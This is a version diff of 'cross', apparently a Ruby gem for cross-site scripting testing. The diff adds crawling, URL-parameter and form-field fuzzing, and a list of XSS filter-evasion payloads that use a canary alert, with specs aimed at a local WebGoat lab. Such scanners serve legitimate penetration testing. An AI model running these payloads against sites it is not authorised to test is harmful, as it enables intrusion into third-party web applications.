cross 0.30.0 → 0.50.0

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA1:
+  metadata.gz: 72b79605b86769c7845420cf772fe7e5ca4251c9
+  data.tar.gz: de0ec4524597cd129cd1957bdca99587b743f0fa
+SHA512:
+  metadata.gz: 4164f2710605496b67199f45f03f4b680c3926909f949b825f16b6a799534afca8c56496275c1d5f5e9a80139268ca0e90e2d189367981c14c64920732441c29
+  data.tar.gz: 8cec8b9fb129209cdf5266b5e046bff9265f06aec82c68dc00c8bb0727a259ca2715bfbfd94790d62356d160ed347efa9a3ee44ff30aeb0f13a2efce9726ec36

data/bin/cross

@@ -5,16 +5,25 @@ require 'logger'
 require 'mechanize'
 require 'cross'
 require 'getoptlong'
+require 'codesake-commons'
 
 opts = GetoptLong.new(
   [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
   [ '--version', '-v', GetoptLong::NO_ARGUMENT ],
   ['--debug', '-D', GetoptLong::NO_ARGUMENT ],
-  ['--exploit-url', '-u', GetoptLong::NO_ARGUMENT]
+  ['--oneshot', '-1', GetoptLong::NO_ARGUMENT ],
+  ['--sample-post', '-S', GetoptLong::REQUIRED_ARGUMENT ],
+  ['--tamper', '-t', GetoptLong::REQUIRED_ARGUMENT ],
+  ['--exploit-url', '-u', GetoptLong::NO_ARGUMENT ],
+  ['--crawl', '-c', GetoptLong::OPTIONAL_ARGUMENT ], 
+  ['--user', '-U', GetoptLong::REQUIRED_ARGUMENT ],
+  ['--password', '-P', GetoptLong::REQUIRED_ARGUMENT ]
 )
 trap("INT") { puts '['+'INTERRUPTED'.color(:red)+']'; exit -1 }
 
-options={:exploit_url=>false, :debug=>false}
+options={:exploit_url=>false, :debug=>false, :oneshot=>false, :sample_post=>"", :parameter_to_tamper=>"", :crawl=>{:enabled=>false, :url_prefix=>nil}, :auth=>{:username=>nil, :password=>nil}}
+$logger = Codesake::Commons::Logging.instance
+$logger.toggle_syslog
 
 opts.each do |opt, arg| 
   case opt
@@ -26,19 +35,55 @@ opts.each do |opt, arg|
     puts "     -h: this help"
     exit 0
   when '--version'
-    puts "cross " + Cross::VERSION
+    puts "cross " + Cross::VERSION + " (C) 2011, 2012 - paolo@armoredcode.com"
     exit 0
-   when '--debug'
-     options[:debug]=true
-   when '--exploit-url'
-     options[:exploit_url]=true
+  when '--oneshot'
+    options[:oneshot] = true
+  when '--tamper'
+    # This option force cross to tamper only the specified form field
+    options[:parameter_to_tamper] = arg unless arg.nil?
+  when '--sample-post' 
+    options[:sample_post] = arg unless File.exist?(arg)
+    options[:sample_post] = File.read(arg) if File.exist?(arg) && File.readable?(arg)
+  when '--debug'
+    options[:debug]=true
+  when '--exploit-url'
+    options[:exploit_url]=true
+
+  when '--crawl'
+    options[:crawl][:enabled]=true
+    options[:crawl][:url_prefix] = arg unless arg.nil?
+  when '--user'
+    options[:auth][:username]=arg
+  when '--password'
+    options[:auth][:password]=arg
   end
 end
 
-puts "cross " + Cross::VERSION + " (C) 2011, 2012 - paolo@armoredcode.com"
+$logger.helo "cross " + Cross::VERSION + " is starting up"
 
 engine = Cross::Engine.instance
 engine.start(options)
 
-raise "cross: missing target" if ARGV.length != 1
-puts "Canary found in output page. Suspected XSS" if engine.inject(ARGV.shift)
+found = false
+$logger.die "missing target" if ARGV.length != 1
+$logger.die "-S and -t flag must be used together" if (options[:sample_post].empty? && ! options[:parameter_to_tamper].empty?) or (! options[:sample_post].empty? && options[:parameter_to_tamper].empty?)
+
+if engine.crawl?
+  result = engine.crawl(ARGV.shift)
+  $logger.die result[:message] if result[:status] == 'KO'
+
+  
+  result[:links].each do |l|
+    $logger.log "Exploiting: #{options[:crawl][:url_prefix]+l}"
+
+    found = engine.inject(options[:crawl][:url_prefix]+l) 
+    $logger.ok "Canary found in output page. Suspected XSS" if found
+  end
+else
+  found = engine.inject(ARGV.shift)
+  $logger.ok "Canary found in output page. Suspected XSS" if found
+end
+
+$logger.err "Canary not found" if ! found
+$logger.helo "cross is leaving"

data/cross.gemspec

@@ -22,4 +22,6 @@ Gem::Specification.new do |gem|
   gem.add_dependency "mechanize"
   gem.add_dependency "logger"
   gem.add_dependency "rainbow"
+
+  gem.add_dependency "codesake-commons"
 end

data/lib/cross.rb

@@ -1,3 +1,3 @@
 require 'cross/version'
 require 'cross/engine'
-
+require 'cross/url'

data/lib/cross/engine.rb

@@ -13,6 +13,10 @@ module Cross
     attr_reader :agent
     attr_accessor :options
 
+    def debug?
+      @options[:debug]
+    end
+
     # Starts the engine
     def start(options={:exploit_url=>false, :debug=>false, :auth=>{}})
       @agent = Mechanize.new {|a| a.log = Logger.new("cross.log")}
@@ -21,55 +25,126 @@ module Cross
       @options = options
     end 
 
-    def inject(url)
-      if @agent.nil?
-        start
-      end
+    def authenticate?
+      ! @options[:auth].nil?  and ! @options[:auth].empty? 
+    end
 
-      if ! @options[:auth].nil?  and ! @options[:auth].empty? 
-        @agent.add_auth(url, @options[:auth][:username], @options[:auth][:password])
+    def crawl?
+      @options[:crawl][:enabled]
+    end
+
+    def crawl(url)
+      start if @agent.nil?
+
+      links = []
+      @agent.add_auth(url, @options[:auth][:username], @options[:auth][:password]) if authenticate?
+      begin 
+        page=@agent.get(url)
+        page=@agent.get(url) if authenticate?
+        page.links.each do |l|
+          @agent.log.debug("Link found: #{l.href}") if debug?
+          links << l.href
+        end
+      rescue Mechanize::UnauthorizedError
+        return {:status=>'KO', :links=>[], :message=>'target website requires authentication'}
+      rescue => e 
+        return {:status=>'KO', :links=>links, :message=>e.to_s}
       end
 
+      return {:status=>'OK', :links=>links, :message=>''}
+    end
+
+    def inject(url)
+      start if @agent.nil?
+
+      $logger.log "Authenticating to the app using #{@options[:auth][:username]}:#{@options[:auth][:password]}" if debug?
+
+      @agent.add_auth(url, @options[:auth][:username], @options[:auth][:password]) if authenticate?
+
       found = false
       if @options[:exploit_url]
         # You ask to exploit the url, so I won't check for form values
 
+        attack_url = Cross::Url.new(url)
+
         Cross::Attack::XSS.each do |pattern|
-          page = @agent.get(url+pattern)
+          attack_url.params.each do |par|
 
-          if @options[:debug]
-            @agent.log.debug(page.body)
-          end
-          scripts = page.search("//script")
-          scripts.each do |sc|
-            if sc.children.text.include?("alert('cross canary');")
-              found = true
-            end
-            if @options[:debug]
-              @agent.log.debug(sc.children.text)
+            page = @agent.get(attack_url.fuzz(par[:name],pattern))
+            @agent.log.debug(page.body) if debug?
+
+            scripts = page.search("//script")
+            scripts.each do |sc|
+              $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert('cross canary')")
+              return true if sc.children.text.include?("alert('cross canary')")
             end
-          end
 
-          puts "GET #{url+pattern}: #{found}"
+            return false if options[:oneshot]
+
+            attack_url.reset
+          end
         end
 
       else
-        page = @agent.get(url)
-        page.forms.each do |f|
-          f.fields.each do |ff|
-            ff.value = "<script>alert('cross canary');</script>"
-          end
-          pp = @agent.submit(f)
-          scripts = pp.search("//script")
-          scripts.each do |sc|
-            if sc.children.text == "alert('cross canary');"
-              found = true
+        begin
+          page = @agent.get(url)
+        rescue Mechanize::UnauthorizedError
+          $logger.err 'Authentication failed. Giving up.'
+          return false
+        rescue Mechanize::ResponseCodeError
+          $logger.err 'Server gave back 404. Giving up.'
+          return false
+        rescue Net::HTTP::Persistent::Error => e
+          $logger.err e.message
+          return false
+        end
+
+        $logger.log "#{page.forms.size} form(s) found" if debug?
+
+        Cross::Attack::XSS.each do |pattern|
+
+          $logger.log "using attack vector: #{pattern}" if debug?
+
+
+          page.forms.each do |f|
+            f.fields.each do |ff|
+              if  options[:sample_post].empty?
+                ff.value = pattern if options[:parameter_to_tamper].empty?
+                ff.value = pattern if ! options[:parameter_to_tamper].empty? && ff.name==options[:parameter_to_tamper]
+              else
+                ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
+                ff.value = pattern if ff.name==options[:parameter_to_tamper]
+
+
+                # promo=Promo1&codice=&nome=&cognome=&indirizzo=%3Cscript%3Ealert%28%27cross+canary%27%29%3C%2Fscript%3E&comune=&CAP=&provincia=&num1=&num2=&mail=&codfisc=&fase=1
+              end
             end
-          end
-        end 
+
+            pp = @agent.submit(f)
+            $logger.log "header: #{pp.header}" if debug? && ! pp.header.empty?
+            $logger.log "body: #{pp.body}" if debug? && ! pp.body.empty?
+            $logger.err "Page is empty" if pp.body.empty?
+            scripts = pp.search("//script")
+            scripts.each do |sc|
+              return true if sc.children.text.include?("alert('cross canary')")
+            end
+          end 
+          return false if options[:oneshot]
+        end
       end
       found
     end
 
+
+    private
+    def find_sample_value_for(sample, name)
+      v=sample.split('&')
+      v.each do |post_param|
+        post_param_v = post_param.split('=')
+        return post_param_v[1] if post_param_v[0] == name
+      end
+
+      return ""
+    end
   end
 end

data/lib/cross/url.rb

@@ -0,0 +1,69 @@
+module Cross
+  class Url
+    
+    attr_reader :url
+    attr_reader :base_url
+    attr_reader :params
+    attr_reader :original_params
+
+    def initialize(url)
+      @url = url
+      @params = []
+      @original_params = []
+      @base_url = url.split('?')[0]
+      p_array = url.split('?')[1].split('&')
+      p_array.each do |p|
+        pp = p.split('=')
+        param = {}
+        param[:name] = pp[0]
+        param[:value] = pp[1] unless pp[1].nil?
+
+        @params << param
+        @original_params  << param.dup
+      end
+      @original_params.freeze
+    end
+
+    def to_s
+      "#{@base_url}?#{params_to_url}"
+    end
+
+    def fuzz(name, value)
+      set(name, value)
+      "#{@base_url}?#{params_to_url}"
+    end
+    
+    def get(name)
+      value = nil
+      @params.each do |p|
+        value = p[:value] if p[:name] == name
+      end
+      value
+    end
+
+    def set(name, value)
+      @params.each do |p|
+        p[:value] = value if p[:name] == name
+      end
+    end
+
+    def reset
+      @params = []
+      @original_params.each do |p|
+        @params << p.dup
+      end
+    end
+
+    def params_to_url
+      ret = ""
+      @params.each do |p|
+        ret += "#{p[:name]}=#{p[:value]}"
+        if !(p == @params.last) 
+          ret +="&"
+        end
+      end
+      ret
+
+    end
+  end
+end

data/lib/cross/version.rb

@@ -1,3 +1,3 @@
 module Cross
-  VERSION = "0.30.0"
+  VERSION = "0.50.0"
 end

data/lib/cross/xss.rb

@@ -5,11 +5,17 @@ module Cross
       def self.each
 
         evasions = [
+          "<script>alert('cross canary')</script>",
           "<script>alert('cross canary');</script>",
+          "/--><script>alert('cross canary')</script>",
           "/--><script>alert('cross canary');</script>",
+          "/--></ScRiPt><ScRiPt>alert('cross canary')</ScRiPt>",
           "/--></ScRiPt><ScRiPt>alert('cross canary');</ScRiPt>",
+          "//;-->alert('cross canary')",
           "//;-->alert('cross canary');",
+          "\"//;\nalert('cross canary')",
           "\"//;\nalert('cross canary');",
+          " onmouseover=alert('1');",
           # more exotic vectors (antisnatchor's collection)
           "<script/anyjunk>alert('cross canary')</script>",
           "<<script>alert('cross canary');//<</script>",

data/spec/url_spec.rb

@@ -0,0 +1,74 @@
+require 'spec_helper'
+
+describe "Url fuzzer" do
+  let (:url) {Cross::Url.new("http://localhost:8080/WebGoat/attack?Screen=130&menu=900")}
+  it "will recognize the param list" do
+    url.params.class.should == Array
+    url.params.size.should == 2
+  end
+
+  it "will recognize parameter names" do
+    url.params[0][:name].should == 'Screen'
+    url.params[1][:name].should == 'menu'
+  end
+
+  it "will recognize parameter values" do
+    url.params[0][:value].should == "130"
+    url.params[1][:value].should == "900"
+  end
+
+  it "will provide a get shortcut for getting parameters value" do
+    url.get("Screen").should == "130"
+    url.get("menu").should == "900"
+  end
+
+  it "will handle errors smoothly" do
+    url.get("nonexistent").should be_nil
+  end
+
+  it "will make a copy of parameters" do
+    url.original_params.should == url.params
+  end
+
+  it "will make params Array to be reverted as string" do
+    url.params_to_url.should == "Screen=130&menu=900"
+  end
+
+  describe "will provide an handy set shortcut that" do
+    it "sets an existing params to a given value" do
+      url.set("Screen", "123")
+      url.get("Screen").should == "123"
+    end
+
+    it "handle the error condition smootly" do
+      url.set("nonexistent", false)
+      url.original_params.should == url.params
+    end
+
+    it "won't change the original params" do
+      url.set("Screen", "123")
+      url.original_params.should_not == url.params
+    end
+  end
+  it "will fuzz" do
+    url.fuzz("Screen", "12").should == "http://localhost:8080/WebGoat/attack?Screen=12&menu=900"
+    url.fuzz("Screen", "afuzztest").should == "http://localhost:8080/WebGoat/attack?Screen=afuzztest&menu=900"
+    url.fuzz("menu", "11").should == "http://localhost:8080/WebGoat/attack?Screen=afuzztest&menu=11"
+  end
+
+  it "will fuzz honoring original params if requested" do
+    url.reset
+    url.get("Screen").should == "130"
+    url.get("menu").should == "900"
+    url.fuzz("Screen", "12").should == "http://localhost:8080/WebGoat/attack?Screen=12&menu=900"
+    url.reset
+    url.get("Screen").should == "130"
+    url.get("menu").should == "900"
+    url.fuzz("Screen", "afuzztest").should == "http://localhost:8080/WebGoat/attack?Screen=afuzztest&menu=900"
+    url.reset
+    url.get("Screen").should == "130"
+    url.get("menu").should == "900"
+    url.fuzz("menu", "11").should == "http://localhost:8080/WebGoat/attack?Screen=130&menu=11"
+
+  end
+end

metadata

@@ -1,110 +1,111 @@
 --- !ruby/object:Gem::Specification
 name: cross
 version: !ruby/object:Gem::Version
-  version: 0.30.0
-  prerelease: 
+  version: 0.50.0
 platform: ruby
 authors:
 - Paolo Perego
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2012-07-23 00:00:00.000000000 Z
+date: 2013-10-11 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake
   requirement: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
   type: :development
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
 - !ruby/object:Gem::Dependency
   name: rspec
   requirement: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
   type: :development
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
 - !ruby/object:Gem::Dependency
   name: rest-open-uri
   requirement: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
 - !ruby/object:Gem::Dependency
   name: mechanize
   requirement: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
 - !ruby/object:Gem::Dependency
   name: logger
   requirement: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
 - !ruby/object:Gem::Dependency
   name: rainbow
   requirement: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
-    none: false
     requirements:
-    - - ! '>='
+    - - '>='
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: codesake-commons
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '>='
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '>='
       - !ruby/object:Gem::Version
         version: '0'
 description: cross is a cross site scripting testing tool
@@ -128,40 +129,36 @@ files:
 - cross.gemspec
 - lib/cross.rb
 - lib/cross/engine.rb
+- lib/cross/url.rb
 - lib/cross/version.rb
 - lib/cross/xss.rb
 - spec/cross_spec.rb
 - spec/spec_helper.rb
+- spec/url_spec.rb
 homepage: ''
 licenses: []
+metadata: {}
 post_install_message: 
 rdoc_options: []
 require_paths:
 - lib
 required_ruby_version: !ruby/object:Gem::Requirement
-  none: false
   requirements:
-  - - ! '>='
+  - - '>='
     - !ruby/object:Gem::Version
       version: '0'
-      segments:
-      - 0
-      hash: 3227883298359843932
 required_rubygems_version: !ruby/object:Gem::Requirement
-  none: false
   requirements:
-  - - ! '>='
+  - - '>='
     - !ruby/object:Gem::Version
       version: '0'
-      segments:
-      - 0
-      hash: 3227883298359843932
 requirements: []
 rubyforge_project: 
-rubygems_version: 1.8.24
+rubygems_version: 2.0.4
 signing_key: 
-specification_version: 3
+specification_version: 4
 summary: cross is a cross site scripting testing tool
 test_files:
 - spec/cross_spec.rb
 - spec/spec_helper.rb
+- spec/url_spec.rb